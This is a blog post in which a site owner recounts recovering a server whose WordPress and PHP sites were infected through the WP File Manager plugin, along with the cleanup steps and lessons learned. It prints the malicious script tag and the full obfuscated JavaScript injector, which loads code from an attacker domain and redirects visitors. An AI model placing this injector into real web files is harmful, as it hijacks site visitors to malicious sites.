WordPress Hacked

WordPress Hacked – Redirects to a different url?

My server got hacked!?!

On 5th September 2020, my server got hacked. I didn’t know what was happening. All the PHP application on one of my server were redirecting to this strange url: https://temp.lowerbeforwarden.ml/ which would redirect to strange ad sites.

I was notified by one of clients that she was getting strange captcha verification for the site and as far I knew I didn’t have anything as such.

I checked the site myself to find it was redirecting to random sites.

I first checked my server to see if I still had the access. To my relief, I had.

I checked the content of the folder and they were still present. Another sigh of relief.

However I still didn’t know what was happening.

The first thing came to mine was an XSS vulnerability or SQL injection on one of the site as it was a Javascript redirect.

I ran a curl on the page and I could see random script on top of the page:

<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>

I went to check other sites and all the sites in that server were redirecting.

Luckily one of the project in the server was running through GIT repo. I did GIT Status to find the changes.

Most that 1000 changes to different files.

On closer inspection, they were mostly index*.*, *.tpl and .js files. That is strange I thought.

I looked for the changes in the file and I could find a few changes:

First:

All index files had following script:

<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'>

All files with and .js extension had:

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

I got an idea what was happening. I logged into the server and trying to search for all the files containing the above keywords.

More than 10000 files had been infected. I knew I had to remove these but how? I wondered for a while.

Then I opened the folder with VS Code and searched the keyword on it. I could actually find these pesky script tags and I ran a quick find and replace on it.

TADA!!!! The scripts had been removed. My PHP application started running fine without redirection. However all wordpress sites were still redirecting.

I was confused at first. I ran a quick CLAMAV scan to find the malicious PHP file. It was one of the plugins I used:

WP-FILE MANAGER!!!!!

If anyone needs that file, please comment below and I might add it somewhere.

TLDR;

The script ran through all the files in the server. ALL THE FILES!!

And added those pesky Javascripts.

It also went through the WP File to find WP database details. Login to the DB server and modify all tables that had POSTS keyword.

Mainly the wp_posts table!

I looked in the database to find more than 9000 rows on one of the clients DB.

At first I thought of restoring from the backup. However I didn’t have the latest one. I usually backup every week! Shame on me I though.

I then looked into reverse engineering this code.

I could see that it did to the database so I just made a quick Update Script:

UPDATE wp_posts
SET 
    post_content = REPLACE(post_content,
        "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>",
        '')
WHERE
    post_content LIKE '%lowerbeforwarden%';

VOILA!!

That modified all the post records and removed the JavaScript code.

However refreshing the page, it was still redirecting!!!

I had a look into the page again with a curl command. I could see these JS being generated in the html file. Strange I though. I re – searched the folder and I couldn’t find any mentions.

Then I realised I had different cache plugins but I couldn’t disable them as I couldn’t login yet.

I just deleted the cache folder inside WP-Content and Cleared browser cache.

The site was up and running!

A few things I learned the hard way:

  1. One user per site so that if one site is hacked, it doesn’t affect the other owners.
  2. Backup! And backup frequently!
  3. Remove plugins that are not required anymore.

Hope this helps!

Leave a Reply

Exit mobile version